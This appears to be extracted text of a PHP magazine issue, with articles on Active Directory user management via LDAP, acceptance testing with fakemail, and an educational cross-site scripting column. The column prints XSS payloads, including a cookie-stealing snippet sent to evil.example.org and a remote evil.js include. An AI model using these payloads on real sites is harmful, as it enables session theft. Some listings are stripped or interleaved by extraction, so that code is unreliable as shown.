certain information about the user, but you don’t store their information in your database and you would like to use AD for this purpose. Filling in the user’s phone number, address, and other elements (that can be derived from the AD server) will help your users by requiring them to type less. The code to accomplish this can be seen in Listing 2. For the purposes of further discussion, we will assume that a connection is already established. Some of the following code might require the administrator privilege. You’ll see a variable called $filter in he code; keep in mind is that this should be treated as almost a SQL statement. The $attributes variable represents the actual pieces of data that you want to receive back from AD. These field names should be separated by commas. AD will supply you only with the fields you request and nothing more. If you do not supply $filter and $attributes, nothing will be returned. The LDAP query yields a confusing return value. The $info variable is a large array of all that was returned from AD. I encourage you to do a print_r() on the $info variable, at least once, to see what is being returned. Dumping a variable like this is a great way to debug your application and explore the variables that come out of AD. Figure 1 contains the output of Listing 2 script. You can think of ldap_get_entries() as mysql_fetch_array(). We will cover this next.
Using AD Groups You can use Microsoft’s AD groups to your advantage. You can fetch a list of all of the groups that the user belongs to, and authenticate these groups against your application. For example, if you are creating an accounting system, you could place all of the accountants into one group. When a user logs into the system, you are able to authenticate the user against AD and then check their groups to ensure that they are part of your application. Allowing AD to manage the groups provides the website developers, database developers, and domain administrators a common ground. This next script (Listing 3) is very basic and can be cut into a smaller script, but is presented this way for educational purposes. This code is similar to ldap.get.userinfo.php (see the code archive). The difference lies in the attributes that are pulled from AD. I chose this script because it is very unique in the way that AD returns the memberOf attribute. I suggest running print_r() to see how the array is returned from AD; by doing so, you will notice that the memberOf attribute is another AD structured array within an array. This may sound confusing, but simply put, it means that you will need to loop on the attribute Volume 4 Issue 11 • php|architect • 47
User Management with Active Directory
itself, to parse through the nested data. When I first started developing using the memberOf attribute, I was confused about how AD structured the data. Upon figuring this out, the method I use to parse then came about very quickly. One way that I use it is to make a comparison between the groups to which the user is a member, and my list of “allowed” groups, in array form. Here’s an example: $compare_array[0][“PHP Developers”][1] = “”; $compare_array[1][“50 Marketing Employees”][1] = ”; $compare_array[2][“Group Name”][Privilege Level] = “”;
Once this comparison has been made, your code will be able to assign a permission level based on the users’ groups. After I authenticated the user and found their privilege level, I assigned a $_SESSION variable that reflected the privilege level. The particular application that I was developing accessed the $_SESSION variable to determine if the user had the correct permission level. It was used instead of accessing AD directly upon every page load, by doing so, I saved server resources and access time.
Altering Information in Active Directory It is very easy to retrieve information from Active Directory. The tough part comes when you are trying to insert users into the AD structure. Microsoft has programmed many features into AD, in order to protect the system as much as possible. In this section, the “Administrator” user will be sufficient if access to the administrator password is available. If the password is not available, add a user to the “Domain Admins” group.
Add a User to Active Directory The main function that is used when adding information to AD is ldap_add(). Let’s look at how ldap_add() works, and how it can be used. It will add a new object to AD. If there is an object currently part of AD with the same CN and/or samaccountname, then the new object cannot be added and you will receive an error. Some attributes cannot be added to AD, and others will appear to have been added, but are not actually saved. Remember, I said that Server 2003 is really picky and very unfriendly when it comes to adding objects. I will now demonstrate how to use ldap_add() for all standard installations. This should work in most cases or with some minor editing. Listing 4 contains the code segment that we will be discussing. This script is broken into many parts but most are “behind the scenes.” As you can see from the script, it is quite simple
LISTING 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14
// Script Name: ldap.connection.inc.php $ldap_conn = ldap_connect(“ldap://$domain”) or die(“The connection to the ldap server “ .”$domain failed.”); $ldapbind = ldap_bind($ldap_conn, $domain_username, $password); if ($ldapbind) { echo “User is authenticated. ”; }else{ echo “User is not authenticated. ”; }
// Script Name: ldap.add.user.php $adduserAD[“cn”] = “chadsmith”; $adduserAD[“samaccountname”] = “chadsmith”; $adduserAD[“objectClass”] = “user”; $adduserAD[“displayname”] = “Chad R. Smith”; $adduserAD[“mail”] = “[email protected]”; $adduserAD[“userPassword”] = “totalWhiteGuy”; $adduserAD[“userAccountControl”] = “512”; $base_dn = “cn=chadsmith,cn=Users,DC=50marketing,DC=com”; echo “Trying to add the user to the system ... ”; if(ldap_add($ldap_conn, $base_dn, $adduserAD) == true) { echo “User added! ”; }
Volume 4 Issue 11 • php|architect • 48
User Management with Active Directory to add the attribute names and the preferred values. Keep in mind that the $base_dn field is crucial, and if set improperly, you will receive an error when the script is executed. The $base_dn variable must reflect the same value that is in samaccountname. If the two fields are not set up the same, you will receive an error message from the AD server and user creation will fail.
Add an Attribute to a User Account If you already have a user object set up in the AD structure, and you want to add an attribute to that object, the easiest way is to use ldap_mod_add(). Assume that you have a page that a new user accesses to log into the server and it’s the user’s first time accessing her account on your system. You can use ldap_mod_add() to allow her to change properties about herself without the assistance of a system administrator. Your application can benefit from this extra information. Error checking should be done on each field to ensure that they meet your organization’s requirements. Listing 5 shows this in action. Upon further review of the script, it is important to discuss the $mod_userAD array. This array is all of the values that you would like to add to AD that are not already present. If there is a value in the attribute that is being changed, AD will throw an error and the change will not occur.
Adding a Group to Active Directory Groups are common in a typical AD structure. They are a great way to allow administrators to grant permissions a number of users at once, instead of on an individual basis. One way that 50 Marketing implemented a groupbased permission scheme was by granting our sales team read access to our priorities listing. If we ever decide to allow the sales people to alter the reports, we don’t have to change all permissions on each user. A common group of users will propagate throughout the whole system. I thought this was a great way to show how to implement this feature into future applications. It may look very similar to the ldap.add.user.php script (see the code archive) with some minor changes. The most apparent difference between the two is the objectClass attribute where it is now set to Group instead of User. Take a look at Listing 6. Again, this code is simple to follow, and takes virtually no time to implement. It will ensure that your groups are set up correctly. Group members can be added by either a drop down box, or typed in manually.
Delete a User from Active Directory Deleting a user is a very simple process and requires almost no programming effort. There are, however, some concerns that we must discuss before I show you how to do this. First, if the user has any Exchange accounts, the following code will not delete them. The second item is that if the user has files associated with the account, they will not be deleted or moved—when this script deletes the account, it will leave orphan files behind on the server. This can be taken care of by a few scripts to tidy up the mess that AD itself doesn’t handle. However, if you are sure that the user doesn’t have an email account and they wouldn’t leave behind any orphan files, or that you simply don’t care and want them deleted Listing 7 shows how you do it. There are only a few lines there but they are very important and need discussed. The first line contains $users_fully_qualified, which is the fully qualified name of the user you are trying to delete. You must tell AD exactly where that user can be found; if you don’t, the system will not know where the user is located and not be able to delete them. AD needs to know exactly who to delete and more importantly where they need to be deleted from. If the script fails to delete a user, it will tell you the reason. If you’re receiving an error, one thing to check is that the path you are passing is accurate. Passing a half-qualified name (example: CN=chadsmith,DC=50marketing,DC=com) isn’t sufficient. You must use something more like CN=chadsmith,CN=Users,DC=50marketing,DC=com. This will tell AD that the user chadsmith in the Users folder needs to be deleted. This means that you can put users in any folder or even any sub folder you just have to know the placing of the username and you will be set.
Delete an Attribute in Active Directory Deleting an attribute is a straightforward process, accomplished with ldap_mod_del(). This function returns true if it is successful and false if it is unable to complete the requested action. This function is very similar to ldap_mod_add(), but instead of adding an attribute, it will delete it. I cannot stress enough that once the information has been overwritten or deleted it is not able to be retrieved. The script in Listing 8 works much like the others, by sending an array of values to AD, but the main difference is that using ldap_mod_del() will delete the attribute by setting them to an empty array.
Volume 4 Issue 11 • php|architect • 49
User Management with Active Directory LISTING 5 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
// Script Name: ldap.mod.add.user.php $mod_userAD[“givenName”] = “Chad”; $mod_userAD[“sn”] = “Smith”; $mod_userAD[“streetAddress”] = “1820 Mulligan Hill Rd.”; $mod_userAD[“l”] = “New Florence”; $mod_userAD[“st”] = “PA”; $mod_userAD[“postalCode”] = “15944”; $mod_userAD[“telephoneNumber”] = “1-724-676-4703”; $mod_userAD[“title”] = “Director of Web Development”; $base_dn = “cn=chadsmith,cn=Users,DC=50marketing,DC=com”; echo “Trying to add the contents to the user ... ”; if(ldap_mod_add($ldapconn, $base_dn, $mod_userAD) == true) { echo “User’s information added! ”; }
Edit Users Information in Active Directory Editing users’ information is a critical part of maintaining accurate records and user accounts. User accounts that change frequently can benefit from having this functionality be a part of your application. Other uses include having a way for the user to log into their account and change some information such as their name, address, and e-mail address. The same rules that have been part of the previous scripts apply— if information is overwritten, you will not be able to retrieve the former values. Let’s review the next script, and I will give you a scenario that happens very often in the “real world.” Typically speaking, if a female gets married, she often acquires the last name of her partner. This leads to a name change in AD to reflect this name modification. The script in Listing 9 turns that annoying chore into a quick, effortless one. We will assume that we have a user with the samaccountname of Maria whose sn is currently Carbone. We need to change her last name to Smith, to make her name current in the global address book. Running this script should produce “User’s information has been altered.” The changes that occur as a result of this script are immediate, and can be used with your application’s auto fill feature, if such practices are desired.
Conclusion My hope is that this article was presented in a way that
LISTING 7 1 2 3 4 5 6 7 8 9
// Script Name: ldap.del.user.php $users_fully_qualified = “cn=chadsmith,cn=Users,” .”DC=50marketing,DC=com”; echo “Trying to delete the user from AD ... ”; if(ldap_delete($ldapconn, $users_fully_qualified == true) { echo “User has been deleted. ”; }
LISTING 8 1 2 3 4 5 6 7 8 9
// Script Name: ldap.mod.del.user.php $mod_delAD[“mail”] = array(); $base_dn = “cn=chadsmith,cn=Users,DC=50marketing,DC=com”; echo “Trying to delete the contents to the user... ”; if(ldap_mod_del($ldap_conn, $base_dn, $mod_delAD) == true) { echo “User’s information has been deleted. ”; }
LISTING 9 1 2 3 4 5 6 7 8 9
// Script Name: ldap.modify.user.php $modifyAD[“sn”] = “Smith”; $base_dn = “cn=Maria,cn=Users,DC=50marketing,DC=com”; echo “Trying to modify the contents to the user... ”; if(ldap_modify($ldap_conn, $base_dn, $modifyAD) == true) { echo “User’s information has been altered. ”; }
was both informational and interesting. Some of the techniques used here can be considered foundational to the next generation of user-authenticated applications. Imagine how nice it would be to avoid writing another lost password page and to have all of your security in perfect order because you allow Active Directory take care of all the password security and encryption. Implementation is quick and easy—typically speaking most login pages run either by E-Mail or by username. Now, when users type in their username and password, instead of authenticating them through a database or flat file, it’s possible to authenticate them through AD. As with any new system, it is wise to have a testing server. To implement this, you won’t have to change much code after the login; of course this depends on the size of your application and your specific needs. If you find something that works better, faster, or more secure please contact me. I will always be exploring and discovering new possibilities where AD can be used.
CHAD SMITH was born and raised in Columbus, Ohio. He recently graduated from DeVry University with a B.S. in Computer Engineering and is currently working for 50 Marketing (www.50marketing.com) where he is the Director of Web Development. 50 Marketing is a full service competitive marketing and advertising agency that delivers more than just services, they deliver momentum. You can contact Chad directly at [email protected]. Volume 4 Issue 11 • php|architect • 50
Anytime
Anytime
Anytime
To Test is to Fake
TEST PATTERN
To Test is to Fake A system test, or “acceptance” test, is very much a black box operation. You set the system up as it is intended to be used and then you carry out realistic user actions and examine the results. When automated, they are a powerful technique that helps to ensure delivery of requirements as well as to assure quality. The problem is that these tests wreak havoc. They change data, send e-mails and so on. Not only do you want to avoid this on the live system, it probably isn’t possible at all on a development box. So, how do we test the whole system? by MARKUS BAKER
A
nyone who has worked with me knows that I am a big fan of testing, preferably with tests written before the code. If testing is a good thing, why not make use of it at the earliest opportunity? Now, testing is tedious and error prone if done manually, so I accept nothing less than an automated test suite. I also expect the resulting test code to document the system. This cuts down on written documentation, that few people will ever read anyway, and it’s also definitive. Unlike comments, the tests won’t lie. This technique (called “acceptance tests”) is especially valuable to ensure that requirements have been met. You can monitor project progress as more and more use cases pass and it’s easier to achieve sign-off if you have a test suite as proof. When written before the code itself, the acceptance tests help to precisely define the scope of the project, early on. If you have seen projects develop a “long tail” of bickering towards the end, with many last minute changes, you will appreciate how useful this can be. Having coded this way for four years, I have collected a few personal tricks and tools to make my life easier. This means that the examples in this article may be a little idiosyncratic. I am not trying to promote my own tools, but one essential idea; there are certainly alternatives that
PHP: Any OTHER SOFTWARE: SimpleTest, fakemail, phpmailer TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/267 CODE DIRECTORY: fake are equally good or better. The idea is that much more of what we do than we think can be automatically tested. Unfortunately there is some real effort involved in testing larger chunks of code. Hopefully I’ll demonstrate that the extra work is not so much, after all, and in so doing convince you to plan for this small additional effort.
The Padded Cell
Tests must be repeatable. A test that fails occasionally is one that you cannot trust even when it passes. Tests must work 100%. Unfortunately this is not always the case. Code that depends on outside resources—an external connection, for example—could fail, not because of the code itself, but simply because the resource became unavailable. A test that fails occasionally in this way cannot be trusted: when it
does finally fail for a good reason, likely the failure will be ignored. If it’s ignored, why write the thing in the first place? When we are testing simple classes, called unit tests, we can fake the risky stuff with mock versions of those objects that wrap resources. Say we have some code like this: $list = &new MailList($mailer); $list->send($monthly_report);
If we are testing the MailList interaction with the mail system in Listing 1. Here, we are using http://sf.net/projects/simpletest),
get(‘home’); } function setUp() { $configuration = &new Configuration(); if ($configuration->isLive()) { die(‘About to delete all data’); } $database = &new Database(); $database->clear(); $database->build(); $this->startFakemail(); } function tearDown() { $database = &new Database(); $database->clear(); $this->stopFakemail(); } function testHappyPath() { $this->get($this->home()); $this->click(‘Register’); $this->setField(‘E-mail’, ‘me@home’); $this->setField(‘Password’, ‘secret’); $this->click(‘Submit’); $this->assertText(‘A mail has been sent’); $finder = &new UserFinder(); $user = &$finder->findByName(‘me’); $this->assertTrue($user->isPending()); $this->clickMailLink(‘me@home’); $this->assertText(‘Welcome’); $user = &$finder->findByName(‘me’); $this->assertFalse($user->isPending()); } function clickMailLink($address) { $mail = file_get_contents(“$address.1”); preg_match(‘//’, $mail, $matches); $url = str_replace(array(‘”’, “’”), ‘’, $matches[1]); $this->get($url); } function startFakemail() { $configuration = new Configuration(); $host = $configuration->get(‘mail_host’); $port = $configuration->get(‘mail_port’); $command = “fakemail --path=../temp “ . “--host=$host --port=$port “ . “--background”; $this->_pid = `$command`; } function stopFakemail() { $command = ‘kill ‘ . $this->_pid; `$command`; } } ?>
version of the mailer. The mock version does not send any mails, it just responds as it should, and makes sure it is called appropriately. You can hand code mock objects fairly easily, but using a tool can make things a little tidier. Here, for instance, the mock object can send messages to the test suite when an expectation is not met. This saves you from sifting through the history of the mock.
Web Page Testing
By intercepting every communication with the outside world, we have placed the code under test into a little padded cell. It will always receive the same results because we control everything. Easy for classes, but have a look at this code snippet:
Volume 4 Issue 11 • php|architect • 53
To Test is to Fake
class RegistrationTest extends WebTestCase { function testHappyPath() { $this->get($this->home()); $this->click(‘Register’); $this->setField(‘E-mail’, ‘me@home’); $this->setField(‘Password’, ‘secret’); $this->click(‘Submit’); $this->assertText(‘A mail has been sent’); } }
This example is the start of an acceptance test. The system is supposed to sign up a new user by clicking on the “Registration” link, and then submitting a form. The test code uses SimpleTest again (see later for alternatives) which acts as a web browser. It fetches pages and clicks buttons using HTTP just like a standard web browser. This way, it treats the software as a black box, and simulates a real user. The trouble is, because the code under test now runs in a separate process, we have no access to it. The top level script will start up with the live objects and classes whether we like it or not. Intercepting at the code level is no longer possible. Luckily, most applications have an alternative hook for switching resources on different machines, namely the configuration file. If we can replace this for testing, then we can redirect the live code to use fake resources—resources that never change. Let’s do it.
Testing a Double Opt-in
file with... home=http://uno/sandbox/index.php uno is my development machine, and a faithful friend. Remember that home() method call in the web test case snippet above? We can now flesh it out... class RegistrationTest extends WebTestCase { function home() { $configuration = &new Configuration(); return $configuration->get(‘home’); } ... }
I am going to fill the test case out piece by piece. I am not going to fill out the application code except for the various utilities we need for testability. You will have to use your imagination for this part. After all, our requirements come before the implementation, and so for an acceptance test we won’t have written application code yet anyway. Pulling resources from a live site by mistake is a favorite accident. You think you are testing the code on your own box, yet whatever you do, the test keeps failing. Right around this time, customer services start to complain about all of these false sign-ups they are suddenly getting. Thus, every URL you use should check the configuration to make the application and tests safe. Also, avoid hard coding anchor tags in pages. Use relative paths. Otherwise you can click() yourself to a live server by mistake. We are now testing pages only on our development box, but are we creating a user?
This is a nice example, because it’s so nasty. When a user signs up they are entered into the database only as a Nuke the Database pending user. To complete registration, they must click on a The first task is to make sure that any database connections link that is mailed to them. This confirms that their e-mail are set up only via the configuration. This should be the address is genuine and that they haven’t been signed up by case anyway, so we’ll assume that this is already true. We a malicious third party. modify our test configuration to look like this: What makes it so nasty? The test code injects a user into the database for a start; also, it sends out e-mails on home=http://uno/sandbox/index.php every test run. We want to start with a clean database, database_user=me because if a user is already signed up, the test will pass for database_password=secret the wrong reasons. Not only that, we want to test pages database_host=localhost from our own development machine, not the current version database_name=sandbox on the live server. This means even the home page URL will be different depending on our environment. Faced with all these FIGURE 1 difficulties, some developers will give up and drop back into the evil Database Mailer UserFinder ways of manual testing. Don’t panic. It’s not as bad as it sounds. Let’s tackle it one step at a Configuration time. First, we need a configuration system that we can override. A quick and dirty solution is the code in Listing 2. If there is a configuration «file» «file» test live file called “test” then that is the one used, otherwise it uses a file called “live”. This allows us to place a temporary test version in place, database sendmail «fake» fakemail even on a live server. database In our development sandbox we now create a “test” configuration
Volume 4 Issue 11 • php|architect • 54
To Test is to Fake The important entry here is the “database_name”. You want to avoid hard coded database names in applications, as you may be testing a machine which is also acting as a live server. Because the other parameters would have to match, the only variable that’s really important is the database name. Most testing tools have a mechanism for running code before and after each test. SimpleTest is no exception, and has the setUp() and tearDown() methods for this. Imagination time. We’ll pretend that all of the database activity is hidden behind a simple class to manage the schema and initial data, called Database. That class has clear() and build() methods to reset the system to it’s empty state. Let’s modify the test case... class RegistrationTest extends WebTestCase { ... function setUp() { $configuration = &new Configuration(); if ($configuration->isLive()) { die(‘About to delete all data’); } $database = &new Database(); $database->clear(); $database->build(); } }
I’m not kidding. I really do want to destroy and rebuild the database on each and every test. I don’t want test interference. So far, we only have one test, but as soon as we add more, we could leave stray data in the system, and this could cause spurious failures in later tests. It’s the 100% rule again. I want 100% reliability for my tests or they are useless. With a baseline established we can write some more test code… class RegistrationTest extends WebTestCase { ... function testHappyPath() { ... $this->assertText(‘A mail has been sent’); $finder = &new UserFinder(); $user = &$finder->findByName(‘me’); $this->assertTrue($user->isPending()); } }
Frankly I am not entirely happy with this. Application code has slipped into an acceptance test. If I were really being black box, I would log-in to the administration interface using the browser and check that the user was listed in the web pages. However, there is a problem with this purist approach. I have to write a lot of application to get the test running. For the test to be useful you want it to protect you from the earliest opportunity. If it can only pass at the end of the project, then it’s not pulling its weight. It’s a delicate balance though, and probably I would go back and make this code truly black box once the administration code was up and running. I am that fanatical. Now, this test will only pass if the application actually creates a user. What about that e-mail?
Goodbye Sendmail
One way of capturing the mail would be to send it to a local POP account. We can actually rule this option out straight away. Besides everything running rather slow and the need to constantly clear the POP account, it would put you at the mercy of mail server configuration. This is beyond most developers at the best of times, but on a live system the security of the mail server should be extreme. It’s unlikely you would be able to fire test e-mails through it from your development boxes. Additionally, if the configuration changes, your tests will fail for the wrong reason. Part of our objective is to isolate our tests from this kind of failure. The solution is much simpler if we can intercept the mail before it even leaves the machine. E-mail is transferred using something called an MTA, or Mail Transfer Agent. An example MTA is the ferociously complicated “sendmail”. The MTA listens on a port, usually 25, and awaits a list of standard text instructions to send a mail. If we can replace the MTA with a simpler one, one that just saves the message as a file, things get a lot easier to test. “Fakemail” is just such a replacement MTA. It’s a simple Perl script that can be downloaded from Sourceforge (http://sf.net/projects/fakemail). When run, it listens on a designated port until killed. If asked to send a mail to say “fred@anywhere”, it will instead save the first message and headers as a file called “[email protected]”. We can start it from within a test case like so... class RegistrationTest extends WebTestCase { ... function startFakemail() { $configuration = new Configuration(); $host = $configuration->get(‘mail_host’); $port = $configuration->get(‘mail_port’); $command = “fakemail --path=../temp “ . “--host=$host --port=$port ” . “--background”; $this->_pid = `$command`; } }
In order, this tells fakemail to: save the mails to the “temp” directory, use the host and port from the configuration, and run as a daemon. When run as a daemon it simply returns its process ID, so we’ll need this to stop it... class RegistrationTest extends WebTestCase { ... function stopFakemail() { $command = ‘kill ‘ . $this->_pid; `$command`; } }
We can call these methods either at the start and end of our test method or, if we need fakemail for several tests, in the setUp() and tearDown() methods. Next, we add this information to our configuration file... home=http://uno/sandbox/index.php database_user=me database_password=secret database_host=localhost database_name=sandbox mail_host=localhost mail_port=10025
Volume 4 Issue 11 • php|architect • 55
To Test is to Fake There is a hitch here. Ideally we would like to use port 25 for fakemail, but it’s likely that another MTA is already using that port. Not only that, but on a Unix system, only the root user is allowed to attach to ports below 1024. Unfortunately, by using a different port we inflict some extra work on ourselves. Our application must be able to select a port from the same configuration as the test. If we’ve used the PHP mail() function in our application, we are in trouble. You cannot select an arbitrary port at run time with this function. To get around this, Listing 3 contains a drop in mail() replacement. It uses the “phpmailer” library (http://phpmailer.sf.net) to send the mail commands.
Worst Case?
The final test case is shown in Listing 4, and the different connections are shown in diagram 1. The test is a little long, but we can easily factor it down if we are testing similar features in other test cases. More importantly, we have had to add several hooks into the application to make it testable at all. That’s a small, but noticeable amount of work. Now, a double opt-in is especially tricky, but there are other awkward cases too. Payment gateways and other network resources are good examples. Is all this extra work worth it? In my experience the answer has always been “yes.” The most powerful features of this approach are precise requirements from the start, fast project sign-off, reduced documentation and constant quality assurance. I can tell that the code is working with a single click of the mouse.
Tools
Disclaimer: I had major parts in the writing of both SimpleTest and fakemail. For unit testing, PHPUnit (PEAR) and “phpt” (built in to PHP) are the main alternatives to SimpleTest. PHPUnit is due to add MockObject support. Soon? SimpleTest is currently the lightest way to test web pages in PHP. It doesn’t handle JavaScript though, so you may want to look at Selenium (JavaScript), JWebUnit (Java), Canoo (XML) or Watir (Ruby). You cannot embed PHP code in these, so you will need special pages to accomplish such things as database clearance. Alternately, you can try to script Microsoft Internet Explorer with OLE automation. I haven’t yet seen an alternative to fakemail, although one shouldn’t be difficult to write. With fakemail you end up with a couple of Perl CPAN dependencies.
MARCUS BAKER works at Wordtracker as a Technical Consultant, where his responsibilities include the development of applications for mining Internet search engine data (www.wordtracker.com). Based in London, he is a regular contributor to Sitepoint forums (www.sitepoint.com). His previous work includes telephony and robotics. Marcus is the lead developer of the SimpleTest project, which is available on Sourceforge. He’s also a big fan of eXtreme programming, which he has been practising for about two years.
Available Right At Your Desk
All our classes take place entirely through the Internet and feature a real, live instructor that interacts with each student through voice or real-time messaging.
What You Get
Your Own Web Sandbox Our No-hassle Refund Policy Smaller Classes = Better Learning
Curriculum
The training program closely follows the certification guide— as it was built by some of its very same authors.
Sign-up and Save!
For a limited time, you can get over $300 US in savings just by signing up for our training program! New classes start every three weeks!
http://www.phparch.com/cert
Volume 4 Issue 11 • php|architect • 56
Cross Site Scripting
SECURITY CORN E R
Cross-Site Scripting Cross-Site Scripting (XSS) has become one of the most prevalent web application security vulnerabilities today. With the growing popularity of Ajax, XSS attacks are more advanced and dangerous than ever. This article introduces cross-site scripting, including its history, common and emerging attacks, and effective safeguards. by CHRIS SHIFLETT
C
ross-site scripting” doesn’t accurately describe the vulnerability, because this name refers to an old exploit. This is a common problem within the security community, because many advances in the field are a result of new attacks being discovered. Because a vulnerability is unknown until someone discovers an attack that exploits it, this is hardly surprising. The attack gets named, and then all attacks that exploit the same vulnerability are given the same name. The original XSS exploit involved the use of frames, a feature rarely used today. By using a frameset, one was able to include content from other domains (sites), and JavaScript within one frame was able to cross web site boundaries to access content from another frame. The most common XSS attacks today don’t do anything cross-site, and this continues to be a cause of some confusion. Even some security professionals have been known to shun the XSS label when an attack only involves a single site.
The Vulnerability XSS exists whenever tainted data is allowed to enter the context of HTML without being properly escaped. Stated differently, when a PHP script outputs data that has neither been filtered nor escaped, it is definitely vulnerable to XSS. This is an easy mistake to make, and the following example demonstrates the vulnerability:
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/268
Although this is an extreme example, it is hopefully clear that $_POST[‘username’] is just one (albeit obvious) example of tainted data. Sometimes, especially without a solid design, it is difficult to determine whether the data in a particular variable is tainted. Some describe XSS as an input filtering problem, and this isn’t entirely accurate. However, it’s easy to see how people reach this conclusion. Consider the use of input filtering as protection: Welcome, {$clean[‘username’]}.”; ?>
If the username is guaranteed to be alphanumeric, then it is safe to be used in the context of HTML. However, this technique addresses the symptom rather than the root cause of the problem. It’s not always possible to eliminate XSS vulnerabilities with filtering alone—it
Volume 4 Issue 11 • php|architect • 57
Cross Site Scripting is a coincidental situation that can exist, but it is not guaranteed. Sometimes, input filtering rules must be very relaxed to accommodate all valid data, and therefore not all valid data can be safely used in the context of HTML. The real solution to the XSS problem requires developers to understand context. In PHP, we can safely store any data in a variable—even binary data. Once that data enters another context, such as HTML, it is important to ensure that it is treated only as data. Note: Understanding context is a topic worthy of its own column. Stay tuned.
The Exploits There are an infinite number of XSS exploits, because the only limitations are those that naturally exist on the client side (and client-side scripting is becoming more and more powerful as browsers advance). I am often disappointed by the number of developers who do not appreciate the dangers that XSS presents. However, I do understand why many have doubts—example exploits are often benign. Security experts don’t want to provide dangerous exploits for fear that they will be misused. One of the most common examples is to attempt to open an alert box: <script>alert(‘XSS’)
Name: <script>alert(‘XSS’)
By correctly guessing the context of the data (it is the value attribute of the form element), an attacker can successfully exploit the form. Traditionally, malicious XSS exploits have been used to steal cookies, because document.cookie can be read and subsequently sent to a remote site using a variety of methods. For example, one such attack is to use XSS as a platform from which to launch a cross-site request forgery (CSRF) attack: <script>document.write(‘’)
If this JavaScript is present in a page on your web site (a possibility that XSS vulnerabilities yield), document.cookie contains cookies associated with your site, and the victim’s browser sends a request to evil.example.org that includes these cookies. The steal.php script conveniently uses $_GET[‘cookies’] to access them. When an attack is too long (perhaps the application truncates the data), attackers can try to reference the malicious code instead, relying on the browser to fetch it: <script src=”http://evil.example.org/evil.js”>
This is hardly a reason to worry, but it effectively identifies a vulnerability. Once a vulnerability is discovered, the possibilities are endless. There are many variants of this benign attack, and some try to guess the specific context in which the data is used. For example, consider a form that repopulates itself whenever there is an error:
There was an error processing the form. Please try again.
Because this approach is so popular, another simple XSS test is to try the following: “><script>alert(‘XSS’)
If provided as the name in the previous example, the form element is redisplayed as follows:
There are numerous other examples and test cases provided in the XSS Cheatsheet: http://ha.ckers.org/xss.html
Emerging attacks are beginning to make use of new advances in client-side scripting, notably AJAX techniques. The most famous of these new attacks is the Myspace worm that infected more than a million accounts before being stopped. Although the viral nature of the worm was the result of a CSRF attack, it was XSS that provided the initial opening and made the worm possible. What makes the Myspace worm particularly frightening is that the use of XMLHttpRequest provides a way around the traditional CSRF protection of using a token in a form as described here: http://shiflett.org/articles/security-corner-dec2004
As the number of people well-versed in client-side technologies continues to increase, we are sure to see more and more creative XSS attacks emerge.
Volume 4 Issue 11 • php|architect • 58
Cross Site Scripting
The Safeguards You should always filter input, but protecting against XSS requires addressing the root cause of the problem—in the context of HTML, anything you want to be considered data needs to be escaped to ensure that it is so. For example, given $name and $location, the following demonstrates how this data can enter a new context: $name is from $location.”; ?>
You might be wondering why PHP can’t escape these values automatically for you. The reason is that it can’t predict your intentions. After all, you might have HTML tags within $name and $location that you intend to be interpreted by the browser: $first_name $last_name”; $location = “$city, $state”; ?>
Only you can really know what you expect to be data (and nothing but data). Whatever your approach, you need to remember to escape the data that you want to preserve. For example, in the previous example, $first_name and $last_name are data, but the HTML bold tags that surround them are not. Therefore, both $first_name and $last_name should be escaped. Escaping is a technique intended to preserve data as it enters a new context. When data leaves your application, it enters a new context, and this is why I frequently simplify this rule to “escape output.” Because this month’s topic is XSS, the context in question is HTML, and there is a simple function to escape data you want to preserve in the context of HTML:
Naming conventions (like the use of $html demonstrated here) can help you keep up with data that can be safely used in another context: Welcome, {$html[‘username’]}.”; ?>
The purpose of escaping is to preserve data in a different context, so data that can cause damage once it has been escaped should never exist. Therefore, escaping alone offers sufficient protection against XSS. Resist the temptation to consider input filtering to be the solution to XSS. As I mentioned previously, your filtering rules might need to be so relaxed that they cannot offer adequate protection. Filtering your input helps ensure data integrity and can increase the reliability and predictability of your applications (all good things), but it does not address the root cause of XSS. However, I do strongly recommend adhering to both practices, and input filtering offers strong protection against many other types of security vulnerabilities. It can also be considered a Defense in Depth mechanism.
Until Next Time... I hope this article helps you appreciate the danger that XSS presents as well as the importance and purpose of escaping. Protecting your applications from XSS attacks requires a few very simple steps, notably escaping your output and employing the use of a naming convention (or similar approach) that can help you reliably distinguish between escaped and unescaped data. Until next month, be safe.
CHRIS SHIFLETT is an internationally recognized expert in the field
Dynamic Web Pages www.dynamicwebpages.de sex could not be better | dynamic web pages - german php.node
of PHP security and the founder and President of Brain Bulb, a PHP consultancy that offers a variety of services to clients around the world. Chris is a leader in the PHP community, and his involvement includes being the founder of the PHP Security Consortium, the founder of PHPCommunity.org, a member of the Zend PHP Advisory Board, and an author of the Zend PHP Certification. A prolific writer, Chris has regular columns in both PHP Magazine and php|architect. He is also the author of HTTP Developer’s Handbook (Sams) as well as the highly acclaimed Essential PHP Security (O’Reilly). You can contact him at [email protected] or visit his web site and blog at http://shiflett.org/.
Volume 4 Issue 11 • php|architect • 59
S PECIAL FEATURE | REV I E W & AN A LY S IS
CONFERENCE COVERAGE
L
oyal readers of my product reviews will know that although I work for this magazine, I will always try to be honest, and if criticisms are leveled they are for the betterment of others and not meant to offend. Having voiced my little disclaimer, I am very happy to be able to review the php|works conference recently held in Toronto, Canada. This conference really had all that any PHP programmer could want, except maybe a trade show floor with display booths for companies to show their wares and the visitors to get swag; but I digress. There were 3 keynote talks at this conference, which were great. Two were given by Rasmus Lerdorf (the original mind behind PHP) and one (the closing keynote) was by Marco Tabini. Marco, of course, is the President of MTA, and the publisher of this magazine. All of the keynotes were informative and interesting to attend. One of the keynotes that Rasmus presented was on XSS (cross site scripting), and how to defend a site against such attacks. It was very interesting to see how many ways a web site can be attacked by those who know how, and even more valuable to be shown how to defend a site against such attacks. Mr. Lerdorf also took a few website addresses from the audience and ran them through a tool that he developed to detect XSS vulnerabilities. Besides the keynotes, there were many sessions to attend that were geared toward both the web developer
and the PHP developer. Sessions covered a broad range: an introduction to PHP, Multilingual Flash, Advanced PHP security, cross browser web design, extension writing basics, a regular expressions clinic, and coverage of PDO (PHP’s new Data Objects solution); and that is just to name a few. As you can see, there were topics here for everyone from the beginner to the advanced. This is a sign of a well thought out and delivered conference. I have included some pictures of events that took place during the conference. The first is a picture of Rasmus receiving a framed CD of all the versions of PHP PHP creator Rasmus Lerdorf receiving a commemorative “10th Anniversary of PHP” plaque
Volume 4 Issue 11 • php|architect • 60
Marco Tabini and Rasmus during the final keynote address
Wez Furlong on PHP Data Objects
